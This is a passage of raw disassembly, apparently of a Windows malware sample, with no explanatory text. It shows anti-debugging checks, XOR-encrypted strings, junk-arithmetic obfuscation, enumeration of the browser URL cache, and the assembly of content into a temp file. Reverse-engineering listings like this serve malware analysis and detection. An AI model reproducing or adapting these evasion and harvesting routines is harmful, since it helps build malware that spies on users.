push dword ptr [eax]
mov edi, [ebp+var_2C]
push edi
push [ebp+var_8]
call sub_40C4E8 ; wsprintfA
add esp, 14h
mov ebx, eax
call sub_40C218 ; GetTickCount
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
inc [ebp+var_4]
loc_40520A: ; CODE XREF: sub_40507F+141�j
mov eax, [ebp+var_10]
cmp [ebp+var_4], eax
jb short loc_4051C2
pop edi
pop esi
pop ebx
leave
retn
sub_40507F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405217 proc near ; CODE XREF: sub_406081+20D�p
var_10 = byte ptr -10h
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov [ebp+var_1], 0B5h
movzx eax, [ebp+var_1]
imul eax, 5C59h
mov [ebp+var_1], al
call sub_40C188 ; GetCurrentProcessId
mov edi, eax
push edi
push 0
push 1F0FFFh
call sub_40C2F0 ; OpenProcess
mov edi, eax
call sub_40C1F4 ; GetProcessHeap
lea eax, [ebp+var_8] ; DATA XREF: sub_43F54D�r
push eax
push 0F00FFh ; DATA XREF: sub_43F559�r
push edi
loc_405254: ; DATA XREF: sub_43F565�r sub_43F571�r
call sub_40C584 ; OpenProcessToken
push edi
call sub_40C1DC ; DATA XREF: sub_43F57D�r
call sub_40C188 ; DATA XREF: sub_43F589�r
loc_405264: ; DATA XREF: sub_43F595�r sub_43F5A1�r
mov eax, dword_441278
add eax, 3FF1h ; DATA XREF: sub_43F5AD�r
push eax
push 40h ; DATA XREF: sub_43F5B9�r
call sub_40C2CC ; DATA XREF: sub_43F5C5�r
mov edi, eax
loc_405278: ; DATA XREF: sub_43F5D1�r
lea eax, [ebp+var_10]
push eax
loc_40527C: ; DATA XREF: sub_43F5DD�r sub_43F5E9�r
mov eax, dword_441278
add eax, 3FF1h ; DATA XREF: sub_43F5F5�r
push eax
push edi
push 1
push [ebp+var_8]
call sub_40C590 ; DATA XREF: sub_43F601�r
push [ebp+arg_0]
push dword ptr [edi]
call sub_40507F
loc_40529C: ; DATA XREF: sub_43F60D�r
add esp, 8
mov [ebp+var_A], 764h
movzx eax, [ebp+var_A] ; DATA XREF: sub_43F6C9�r
imul eax, 5860h ; DATA XREF: sub_43F6D5�r
mov [ebp+var_A], ax ; DATA XREF: sub_43F6E1�r
push edi
loc_4052B4: ; DATA XREF: sub_43F6ED�r sub_43F6F9�r
call sub_40C2D8 ; LocalFree
call sub_40C194 ; DATA XREF: sub_43F705�r
push [ebp+var_8] ; DATA XREF: sub_43F711�r
call sub_40C1DC ; DATA XREF: sub_43F71D�r
call sub_40C2B4 ; DATA XREF: sub_43F729�r
pop edi
locret_4052CC: ; DATA XREF: sub_43F735�r
leave
retn
sub_405217 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4052CE proc near ; CODE XREF: sub_405409+4F�p
; sub_405409+B1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp ; DATA XREF: sub_43F741�r
push ecx
push esi
push edi
loc_4052D4: ; DATA XREF: sub_43F74D�r
mov esi, [ebp+arg_4]
push esi
loc_4052D8: ; DATA XREF: sub_43F759�r
push [ebp+arg_0]
mov eax, dword_441294 ; DATA XREF: sub_43F765�r
loc_4052E0: ; DATA XREF: sub_43F771�r sub_43F77D�r
lea eax, ds:418410h[eax]
push eax
loc_4052E8: ; DATA XREF: sub_43F789�r sub_43F795�r
call sub_40C674
add esp, 0Ch
loc_4052F0: ; DATA XREF: sub_43F7A1�r sub_43F7AD�r
mov [ebp+var_4], 52h
xor edi, edi ; DATA XREF: sub_43F7B9�r
jmp short loc_405315
; ---------------------------------------------------------------------------
loc_4052FB: ; CODE XREF: sub_4052CE+49�j
mov eax, dword_441294
add eax, edi
lea eax, ds:418410h[eax] ; DATA XREF: sub_43F7C5�r
; sub_43F7D1�r
movsx edx, byte ptr [eax]
loc_40530C: ; DATA XREF: sub_43F7DD�r sub_43F7E9�r
xor edx, 0A7h
mov [eax], dl
loc_405314: ; DATA XREF: sub_43F7F5�r
inc edi
loc_405315: ; CODE XREF: sub_4052CE+2B�j
cmp edi, esi
jl short loc_4052FB ; DATA XREF: sub_43F801�r
mov eax, dword_441294 ; DATA XREF: sub_43F80D�r
add eax, esi
loc_405320: ; DATA XREF: sub_43F819�r sub_43F825�r
mov byte ptr ds:dword_418410[eax], 0
xor edi, edi
mov edi, dword_441294
loc_405330: ; DATA XREF: sub_43F831�r sub_43F83D�r
add dword_441294, 2
mov eax, dword_441294 ; DATA XREF: sub_43F849�r
loc_40533C: ; DATA XREF: sub_43F855�r
lea eax, [eax+esi+5]
loc_405340: ; DATA XREF: sub_43F861�r sub_43F86D�r
mov dword_441294, eax
inc dword_441294 ; DATA XREF: sub_43F879�r
cmp dword_441294, 0DD6h ; DATA XREF: sub_43F885�r
; sub_43F891�r ...
jle short loc_40535E
and dword_441294, 0 ; DATA XREF: sub_43F8A9�r
loc_40535E: ; CODE XREF: sub_4052CE+87�j
lea eax, dword_418410[edi]
loc_405364: ; DATA XREF: sub_43F8B5�r
pop edi
pop esi
leave
retn
sub_4052CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405368 proc near ; CODE XREF: sub_4063A9+46A�p
; sub_4063A9+487�p
; DATA XREF: ...
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_8 = byte ptr -8
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h ; DATA XREF: sub_43F8CD�r
push ebx
push esi
loc_405370: ; DATA XREF: sub_43F8D9�r
push edi
lea edi, [ebp+var_3]
loc_405374: ; DATA XREF: sub_43F8E5�r sub_43F8F1�r
lea esi, byte_44129C
xor ecx, ecx
loc_40537C: ; DATA XREF: sub_43F8FD�r
inc ecx
rep movsb
lea edi, [ebp+var_D] ; DATA XREF: sub_43F909�r
lea esi, aARc ; DATA XREF: j_aARc�r
; "a`rc"
loc_405388: ; DATA XREF: sub_43F921�r sub_43F92D�r
mov ecx, 5
rep movsb
push 0 ; DATA XREF: sub_43F939�r
push 80h ; DATA XREF: sub_43F945�r
push 4
loc_405398: ; DATA XREF: sub_43F951�r
push 0
push 0
push 0C0000000h
push [ebp+arg_0]
call sub_40C2FC ; CreateFileA
mov ebx, eax
mov [ebp+var_2], 5481h
sub [ebp+var_2], 4D02h
cmp ebx, 0FFFFFFFFh
jnz short loc_4053C0
xor eax, eax
jmp short loc_405404
; ---------------------------------------------------------------------------
loc_4053C0: ; CODE XREF: sub_405368+52�j
call sub_40C1F4 ; GetProcessHeap
push 2
push 0
push 0
push ebx
call sub_40C32C ; SetFilePointer
lea edi, [ebp+var_E]
lea esi, byte_4412A2
xor ecx, ecx
inc ecx
rep movsb
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_40C3B0 ; WriteFile
call sub_40C224 ; GetVersion
push ebx
call sub_40C1DC ; CloseHandle
call sub_40C218 ; GetTickCount
xor eax, eax
inc eax
loc_405404: ; CODE XREF: sub_405368+56�j
pop edi
pop esi
pop ebx
leave
retn
sub_405368 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405409 proc near ; CODE XREF: sub_4063A9+3CE�p
var_2F5D = byte ptr -2F5Dh
var_2F5C = byte ptr -2F5Ch
var_2F5B = byte ptr -2F5Bh
var_2F5A = word ptr -2F5Ah
var_2F58 = dword ptr -2F58h
var_2F51 = byte ptr -2F51h
var_2F50 = byte ptr -2F50h
var_2F48 = word ptr -2F48h
var_2F46 = word ptr -2F46h
var_2F43 = byte ptr -2F43h
var_1F44 = dword ptr -1F44h
var_1F40 = byte ptr -1F40h
var_1F3C = dword ptr -1F3Ch
var_1F38 = dword ptr -1F38h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2F60h
call sub_40C118
push ebx
push esi
push edi
call sub_40C2B4 ; IsDebuggerPresent
lea edi, [ebp+var_2F50]
lea esi, byte_4412A3
movsd
movsd
lea edi, [ebp+var_2F51]
lea esi, byte_4412AB
xor ecx, ecx
inc ecx
rep movsb
push [ebp+arg_0]
lea eax, [ebp+var_2F43]
push eax
call sub_40C138
call sub_40C2B4 ; IsDebuggerPresent
push 1
push offset aS ; "˜"
call sub_4052CE
mov edi, 0Bh
sub edi, dword_441290
push edi
push eax
lea edi, [ebp+var_2F43]
push edi
call sub_40181E
add esp, 14h
mov edi, eax
mov [ebp+var_2F48], di
movzx eax, [ebp+var_2F48]
cmp eax, 0FFFFh
jz short loc_40549F
movzx eax, [ebp+var_2F48]
mov [ebp+eax+var_2F43], 0
loc_40549F: ; CODE XREF: sub_405409+85�j
call sub_40C194 ; GetCurrentThreadId
mov [ebp+var_1F44], 1F40h
call sub_40C218 ; GetTickCount
push 3
push offset aNin ; "‰"
call sub_4052CE
add esp, 8
lea edi, [ebp+var_1F44]
push edi
lea edi, [ebp+var_1F40]
push edi
push eax
call sub_40B698 ; FindFirstUrlCacheEntryA
mov ebx, eax
or eax, eax
jz loc_4055FB
mov [ebp+var_2F46], 174Fh
movzx eax, [ebp+var_2F46]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2F46], ax
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40C644
add esp, 8
or eax, eax
jnz short loc_405536
call sub_40C224 ; GetVersion
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C138
call sub_40C224 ; GetVersion
xor eax, eax
inc eax
jmp loc_4055FB
; ---------------------------------------------------------------------------
loc_405536: ; CODE XREF: sub_405409+10B�j
; sub_405409:loc_4055F4�j
mov [ebp+var_2F5B], 0DEh
add [ebp+var_2F5B], 3Dh
mov [ebp+var_1F44], 1F40h
mov [ebp+var_2F58], 7B4Bh
mov eax, [ebp+var_2F58]
mov edx, eax
add edx, eax
mov [ebp+var_2F58], edx
lea eax, [ebp+var_1F44]
push eax
lea eax, [ebp+var_1F40]
push eax
push ebx
call sub_40B6A4 ; FindNextUrlCacheEntryA
or eax, eax
jz short loc_4055F9
mov [ebp+var_2F5A], 42E5h
movzx eax, [ebp+var_2F5A]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2F5A], ax
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40C644
add esp, 8
or eax, eax
jnz short loc_4055F4
lea edi, [ebp+var_2F5D]
lea esi, byte_4412AC
xor ecx, ecx
inc ecx
rep movsb
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C138
mov [ebp+var_2F5C], 0F4h
movzx eax, [ebp+var_2F5C]
imul eax, 0D16h
mov [ebp+var_2F5C], al
xor eax, eax
inc eax
jmp short loc_4055FB
; ---------------------------------------------------------------------------
loc_4055F4: ; CODE XREF: sub_405409+1AB�j
jmp loc_405536
; ---------------------------------------------------------------------------
loc_4055F9: ; CODE XREF: sub_405409+175�j
xor eax, eax
loc_4055FB: ; CODE XREF: sub_405409+D1�j
; sub_405409+128�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_405409 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405600 proc near ; CODE XREF: sub_4056EE+607�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_11 = byte ptr -11h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call sub_40C218 ; GetTickCount
push [ebp+arg_0]
call sub_40C3BC ; lstrlenA
mov [ebp+var_8], eax
lea edi, [ebp+var_11]
lea esi, a8x6d ; "8x6d"
mov ecx, 5
rep movsb
mov edi, [ebp+var_8]
shl edi, 1
add edi, 8
push edi
push 40h
call sub_40C2CC ; LocalAlloc
mov [ebp+var_C], eax
mov ebx, 5DB7h
mov eax, ebx
add eax, ebx
mov ebx, eax
xor ebx, ebx
jmp short loc_405667
; ---------------------------------------------------------------------------
loc_40564B: ; CODE XREF: sub_405600+6A�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+ebx]
xor eax, 71h
or eax, eax
jz short loc_405666
mov eax, ebx
add eax, [ebp+arg_0]
movzx edx, byte ptr [eax]
xor edx, 71h
mov [eax], dl
loc_405666: ; CODE XREF: sub_405600+57�j
inc ebx
loc_405667: ; CODE XREF: sub_405600+49�j
cmp ebx, [ebp+var_8]
jb short loc_40564B
lea edi, [ebp+var_16]
lea esi, aLw ; "Lw%$"
mov ecx, 5
rep movsb
mov [ebp+var_2], 0
jmp short loc_4056DD
; ---------------------------------------------------------------------------
loc_405684: ; CODE XREF: sub_405600+E4�j
push 6
push offset aVVV ; "‚Ô‚Ä‚Ä"
call sub_4052CE
mov [ebp+var_1C], eax
movzx edi, [ebp+var_2]
mov esi, [ebp+arg_0]
movzx edi, byte ptr [esi+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_20], edx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_C]
push edi
mov esi, [ebp+var_1C]
push esi
push edi
call sub_40C6B0
add esp, 1Ch
inc [ebp+var_2]
loc_4056DD: ; CODE XREF: sub_405600+82�j
movzx eax, [ebp+var_2]
cmp eax, [ebp+var_8]
jb short loc_405684
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
leave
retn
sub_405600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056EE proc near ; CODE XREF: sub_4063A9+135�p
var_300B0 = dword ptr -300B0h
var_300AC = dword ptr -300ACh
var_300A8 = dword ptr -300A8h
var_300A1 = byte ptr -300A1h
var_300A0 = dword ptr -300A0h
var_3009A = word ptr -3009Ah
var_30098 = dword ptr -30098h
var_30094 = dword ptr -30094h
var_30090 = dword ptr -30090h
var_3008C = dword ptr -3008Ch
var_30088 = dword ptr -30088h
var_30084 = dword ptr -30084h
var_3007F = byte ptr -3007Fh
var_3007C = byte ptr -3007Ch
var_30076 = word ptr -30076h
var_30074 = byte ptr -30074h
var_3006F = byte ptr -3006Fh
var_30068 = word ptr -30068h
var_30066 = dword ptr -30066h
var_30062 = byte ptr -30062h
var_3005A = byte ptr -3005Ah
var_30054 = byte ptr -30054h
var_30053 = byte ptr -30053h
var_3004C = word ptr -3004Ch
var_3004A = byte ptr -3004Ah
var_30045 = byte ptr -30045h
var_30042 = word ptr -30042h
var_30040 = word ptr -30040h
var_3003E = word ptr -3003Eh
var_3003B = byte ptr -3003Bh
var_30031 = byte ptr -30031h
var_30030 = dword ptr -30030h
var_30029 = byte ptr -30029h
var_3001F = byte ptr -3001Fh
var_3001E = word ptr -3001Eh
var_3001C = dword ptr -3001Ch
var_30018 = dword ptr -30018h
var_30014 = dword ptr -30014h
var_30010 = dword ptr -30010h
var_3000C = byte ptr -3000Ch
var_2000C = dword ptr -2000Ch
var_20008 = dword ptr -20008h
var_20003 = byte ptr -20003h
var_10004 = dword ptr -10004h
var_10000 = byte ptr -10000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 300B0h
call sub_40C118
push ebx
push esi
push edi
call sub_40C194 ; GetCurrentThreadId
and [ebp+var_30018], 0
lea edi, [ebp+var_30045]
lea esi, aQ ; "q<"
mov ecx, 3
rep movsb
and [ebp+var_2000C], 0
and [ebp+var_30014], 0
lea eax, [ebp+var_10004]
push eax
push [ebp+arg_4]
call sub_401AC1
add esp, 8
mov ebx, eax
mov [ebp+var_3001E], 1318h
inc [ebp+var_3001E]
mov eax, [ebp+var_10004]
or eax, eax
jz short loc_405762
or ebx, ebx
jz short loc_405762
cmp [ebp+arg_14], eax
jb short loc_405785
loc_405762: ; CODE XREF: sub_4056EE+69�j
; sub_4056EE+6D�j
call sub_40C188 ; GetCurrentProcessId
push ebx
call sub_40C2D8 ; LocalFree
mov [ebp+var_3007F], 58h
sub [ebp+var_3007F], 0B8h
mov [ebp+var_30018], 1
loc_405785: ; CODE XREF: sub_4056EE+72�j
push [ebp+arg_C]
call sub_40C3BC ; lstrlenA
mov [ebp+var_30084], eax
mov eax, 64h
mul [ebp+var_10004]
mov [ebp+var_30088], eax
mov edi, [ebp+var_30084]
imul edi, [ebp+var_30084], 32h
mov esi, [ebp+var_30088]
lea edi, [esi+edi+1000h]
push edi
push 40h
call sub_40C2CC ; LocalAlloc
mov [ebp+var_20008], eax
call sub_40C218 ; GetTickCount
lea edi, [ebp+var_3004A]
lea esi, aR1 ; "R1|`"
mov ecx, 5
rep movsb
mov ax, word_4412BF
mov [ebp+var_3004C], ax
push [ebp+arg_0]
push 104h
call sub_40C20C ; GetTempPathA
call sub_40C218 ; GetTickCount
mov eax, [ebp+arg_0]
mov [ebp+var_3008C], eax
mov ecx, eax
or eax, 0FFFFFFFFh
loc_405811: ; CODE XREF: sub_4056EE+128�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405811
mov edi, eax
mov esi, 12h
sub esi, dword_441290
push esi
mov esi, [ebp+var_3008C]
add esi, edi
push esi
call sub_401719
add esp, 8
call sub_40C1B8 ; RtlGetLastWin32Error
push 4
push offset aI ; "‰ÏÓÊ"
call sub_4052CE
add esp, 8
push eax
push [ebp+arg_0]
call sub_40C6D4
add esp, 8
lea edi, [ebp+var_30053]
lea esi, a_mU2 ; "%.m%u2"
mov ecx, 7
rep movsb
lea edi, [ebp+var_30054]
lea esi, byte_4412C8
mov ecx, 1
rep movsb
push 6
push offset aIS ; "›ÏÓÊË™"
call sub_4052CE
add esp, 8
push eax
push [ebp+var_20008]
call sub_404A6B
add esp, 8
call sub_40C1B8 ; RtlGetLastWin32Error
push 6
push offset aIS_0 ; "›ÏÂÆÙ"
call sub_4052CE
add esp, 8
push eax
push [ebp+var_20008]
call sub_404A6B
add esp, 8
call sub_40C2B4 ; IsDebuggerPresent
push 13h
push offset aISvVIiS ; "›ÓÎÓË™‚Ô‚Ò›ˆÓÎÓË™"
call sub_4052CE
add esp, 8
push [ebp+arg_1C]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C6B0
add esp, 10h
mov [ebp+var_3001F], 95h
add [ebp+var_3001F], 11h
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404A6B
add esp, 8
push 7
push offset aIiS ; "›ˆÏÂÆÙ"
call sub_4052CE
add esp, 8
push eax
push [ebp+var_20008]
call sub_404A6B
add esp, 8
call sub_40C224 ; GetVersion
push 6
push offset aIS_1 ; "›ÅÈÃÞ™"
call sub_4052CE
add esp, 8
push eax
push [ebp+var_20008]
call sub_404A6B
add esp, 8
lea edi, [ebp+var_3005A]
lea esi, aMZW ; "M=z>w"
mov ecx, 6
rep movsb
lea edi, [ebp+var_30062]
lea esi, aRIAb ; "r I^^€b"
mov ecx, 8
rep movsb
push 5
push offset aVif ; "Á‚‰”Ò"
call sub_4052CE
add esp, 8
mov [ebp+var_30090], eax
call sub_40C698
mov ecx, 3E8h
cdq
idiv ecx
push edx
mov edi, [ebp+var_30090]
push [ebp+var_30090]
lea edi, [ebp+var_30029]
push edi
call sub_40C6B0
add esp, 0Ch
mov [ebp+var_30030], 46Bh
sub [ebp+var_30030], 6AF4h
push 2Ah
push offset word_44625E
call sub_4052CE
add esp, 8
lea edi, [ebp+var_30029]
push edi
push [ebp+arg_8]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C6B0
add esp, 10h
call sub_40C224 ; GetVersion
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404A6B
add esp, 8
mov eax, dword_4412D7
mov [ebp+var_30066], eax
push 2Dh
push offset aIZEEzAvAzAAsiS ; "›ÎÉ×ÒÓ‡ÓÞך…ÂÃÎÓ…‡ÑÆËÒš€‚Ò€‡ÉÆÊš€Æ€™"...
call sub_4052CE
add esp, 8
mov [ebp+var_30094], eax
call sub_40C698
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 14h
push edi
mov edi, [ebp+var_30094]
push [ebp+var_30094]
lea edi, [ebp+var_20003]
push edi
call sub_40C6B0
add esp, 0Ch
call sub_40C2B4 ; IsDebuggerPresent
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404A6B
add esp, 8
call sub_40C218 ; GetTickCount
cmp [ebp+var_30018], 0
jnz loc_405D95
mov [ebp+var_30031], 2Ah
add [ebp+var_30031], 23h
cmp [ebp+arg_18], 0
jz loc_405BFD
mov [ebp+var_3009A], 7904h
add [ebp+var_3009A], 1B64h
and [ebp+var_30098], 0
jmp loc_405BE0
; ---------------------------------------------------------------------------
loc_405AB9: ; CODE XREF: sub_4056EE+4FE�j
call sub_40C2B4 ; IsDebuggerPresent
mov [ebp+var_10000], 0
mov [ebp+var_300A1], 9Ch
add [ebp+var_300A1], 60h
and [ebp+var_300A0], 0
jmp loc_405B82
; ---------------------------------------------------------------------------
loc_405ADF: ; CODE XREF: sub_4056EE+49E�j
call sub_40C194 ; GetCurrentThreadId
mov eax, [ebp+var_30098]
add eax, [ebp+var_300A0]
cmp eax, [ebp+var_10004]
jnb loc_405B92
mov [ebp+var_300A8], 7D75h
sub [ebp+var_300A8], 7DFBh
push 6
push offset aVVV ; "‚Ô‚Ä‚Ä"
call sub_4052CE
mov [ebp+var_300AC], eax
mov edi, [ebp+var_30098]
add edi, [ebp+var_300A0]
movzx edi, byte ptr [ebx+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_300B0], edx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_10000]
push edi
mov edi, [ebp+var_300AC]
push edi
lea edi, [ebp+var_10000]
push edi
call sub_40C6B0
add esp, 1Ch
inc [ebp+var_300A0]
loc_405B82: ; CODE XREF: sub_4056EE+3EC�j
cmp [ebp+var_300A0], 80h
jb loc_405ADF
loc_405B92: ; CODE XREF: sub_4056EE+408�j
push 30h
push offset aIZEEzAvAzAvVAs ; "›ÎÉ×ÒÓ‡ÓÞך…ÂÃÎÓ…‡ÑÆËÒš€‚Ô€‡ÉÆÊš€‚Ô‚"...
call sub_4052CE
push [ebp+var_2000C]
push [ebp+arg_10]
lea edi, [ebp+var_10000]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C6B0
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404A6B
add esp, 24h
add [ebp+var_30098], 80h
inc [ebp+var_2000C]
loc_405BE0: ; CODE XREF: sub_4056EE+3C6�j
mov eax, [ebp+var_10004]
cmp [ebp+var_30098], eax
jb loc_405AB9
mov [ebp+var_30014], eax
jmp loc_405D95
; ---------------------------------------------------------------------------
loc_405BFD: ; CODE XREF: sub_4056EE+3A7�j
call sub_40C224 ; GetVersion
mov eax, [ebp+arg_14]
mov [ebp+var_10004], eax
jmp loc_405D71
; ---------------------------------------------------------------------------
loc_405C10: ; CODE XREF: sub_4056EE+6A1�j
call sub_40C1B8 ; RtlGetLastWin32Error
cmp [ebp+var_10000], 0
jz loc_405D71
mov dword ptr [ebp-3009Ch], 77B9h
sub dword ptr [ebp-3009Ch], 0C7Eh
mov eax, [ebp+arg_14]
add eax, 0C800h
cmp [ebp+var_10004], eax
jnb loc_405D95
call sub_40C2B4 ; IsDebuggerPresent
mov eax, [ebp+var_10004]
mov [ebp+var_30014], eax
push 3
push offset aV ; "‚ÔÛ"
call sub_4052CE
push [ebp+arg_C]
push eax
lea edi, [ebp+var_3000C]
push edi
call sub_40C6B0
add esp, 14h
mov word ptr [ebp+var_30098+2], 1740h
movzx eax, word ptr [ebp+var_30098+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_30098+2], ax
lea ecx, [ebp+var_3000C]
or eax, 0FFFFFFFFh
loc_405CA0: ; CODE XREF: sub_4056EE+5B7�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405CA0
mov edi, eax
mov word ptr [ebp+var_300A8+2], di
mov word ptr [ebp+var_300A0+2], 6946h
inc word ptr [ebp+var_300A0+2]
lea eax, [ebp+var_10000]
push eax
movzx eax, word ptr [ebp+var_300A8+2]
lea eax, [ebp+eax+var_3000C]
push eax
call sub_40C138
lea edi, [ebp+var_300B0+3]
lea esi, aFBe ; "F#=e "
mov ecx, 7
rep movsb
lea eax, [ebp+var_3000C]
push eax
call sub_405600
add esp, 4
mov [ebp+var_30010], eax
push 30h
push offset aIZEEzAvAzAvVAs ; "›ÎÉ×ÒÓ‡ÓÞך…ÂÃÎÓ…‡ÑÆËÒš€‚Ô€‡ÉÆÊš€‚Ô‚"...
call sub_4052CE
add esp, 8
push [ebp+var_2000C]
push [ebp+arg_10]
push [ebp+var_30010]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C6B0
add esp, 14h
call sub_40C224 ; GetVersion
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404A6B
add esp, 8
call sub_40C188 ; GetCurrentProcessId
push [ebp+var_30010]
call sub_40C2D8 ; LocalFree
mov dword ptr [ebp-300A4h], 7098h
inc dword ptr [ebp-300A4h]
inc [ebp+var_2000C]
loc_405D71: ; CODE XREF: sub_4056EE+51D�j
; sub_4056EE+52E�j
lea eax, [ebp+var_10000]
push eax
push [ebp+var_10004]
push ebx
call sub_401C5D
add esp, 0Ch
mov [ebp+var_10004], eax
or eax, eax
jnz loc_405C10
loc_405D95: ; CODE XREF: sub_4056EE+38F�j
; sub_4056EE+50A�j ...
push 1Eh
push offset aIZEEzAas ; "›ÎÉ×ÒÓ‡ÓÞך…ÔÒÅÊÎÓ…‡ÑÆËÒš€€™"
call sub_4052CE
push eax
push [ebp+var_20008]
call sub_404A6B
push 7
push offset aIiS_0 ; "›ˆÁÈÕÊ™"
call sub_4052CE
push eax
push [ebp+var_20008]
call sub_404A6B
call sub_40C1F4 ; GetProcessHeap
push 8
push offset aIS_2 ; "›ÔÄÕÎ×Ó™"
call sub_4052CE
push eax
push [ebp+var_20008]
call sub_404770
mov ax, word_4412E2
mov [ebp+var_30068], ax
lea edi, [ebp+var_3006F]
lea esi, aYmkm ; " ymkm&"
mov ecx, 7
rep movsb
push 6
push offset aVVix ; "‚Ä‚‰•Ò"
call sub_4052CE
mov [ebp+var_30098], eax
call sub_40C698
mov [ebp-3009Ch], eax
call sub_40C698
mov ecx, 63h
cdq
idiv ecx
push edx
mov edi, [ebp-3009Ch]
mov eax, edi
mov ecx, 14h
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_30098]
push edi
lea edi, [ebp+var_3003B]
push edi
call sub_40C6B0
call sub_40C1B8 ; RtlGetLastWin32Error
push 0Eh
push offset aZvPo ; "ÁÒÉÄÓÎÈɇ‚ÔŽÜ"
call sub_4052CE
lea edi, [ebp+var_3003B]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C6B0
call sub_40C224 ; GetVersion
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404770
call sub_40C1F4 ; GetProcessHeap
push 15h
push offset aIvIPo ; "ÃÈÄÒÊÂÉÓ‰‚Ô‰ÔÒÅÊÎÓŽœ"
call sub_4052CE
lea edi, [ebp+var_30029]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C6B0
lea edi, [ebp+var_30074]
lea esi, aWG ; "%W*ƒ"
mov ecx, 5
rep movsb
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404770
call sub_40C218 ; GetTickCount
push 1
push offset byte_44619D
call sub_4052CE
push eax
push [ebp+var_20008]
call sub_404770
push 16h
push offset word_446186
call sub_4052CE
mov [ebp+var_300A0], eax
call sub_40C698
mov ecx, 3E8h
cdq
idiv ecx
mov edi, edx
add edi, 2710h
push edi
lea edi, [ebp+var_3003B]
push edi
mov edi, [ebp+var_300A0]
push edi
lea edi, [ebp+var_20003]
push edi
call sub_40C6B0
call sub_40C218 ; GetTickCount
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404770
mov ax, word_4412F0
mov [ebp+var_30076], ax
push 9
push offset aIiS_1 ; "›ˆÔÄÕÎ×Ó™"
call sub_4052CE
push eax
push [ebp+var_20008]
call sub_404A6B
mov [ebp+var_3003E], 69FDh
inc [ebp+var_3003E]
push 7
push offset aIiS_2 ; "›ˆÅÈÃÞ™"
call sub_4052CE
push eax
push [ebp+var_20008]
call sub_404A6B
call sub_40C2B4 ; IsDebuggerPresent
push 7
push offset aIiS_3 ; "›ˆÏÓÊË™"
call sub_4052CE
push eax
push [ebp+var_20008]
call sub_40C6D4
call sub_40C1B8 ; RtlGetLastWin32Error
push [ebp+arg_0]
call sub_40352B
add esp, 0E4h
mov [ebp+var_30040], 3406h
add [ebp+var_30040], 797Bh
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+arg_0]
call sub_40C2FC ; CreateFileA
mov [ebp+var_3001C], eax
mov [ebp+var_30042], 3BB2h
sub [ebp+var_30042], 6434h
push [ebp+var_20008]
